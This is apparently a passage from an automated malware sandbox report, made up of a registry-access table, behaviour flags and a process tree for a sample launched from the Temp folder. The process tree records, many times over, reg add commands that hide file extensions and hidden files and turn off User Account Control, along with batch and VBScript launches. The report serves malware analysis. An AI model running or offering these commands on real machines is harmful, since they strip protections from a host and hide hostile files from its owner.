| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
"C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe"
C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe
"C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe"
C:\ProgramData\fGoIwkok\pWEYIMQs.exe
"C:\ProgramData\fGoIwkok\pWEYIMQs.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\juEQgswk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JkAsIscU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\riwsooIw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gQgAgsco.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\seMUMEQc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wkwgwsIs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aecQkcAE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LoAwUIQs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEQYoMwM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VicUkMsI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pwwAAEoQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YgMAAIMI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmswYYQk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UogAUYYY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
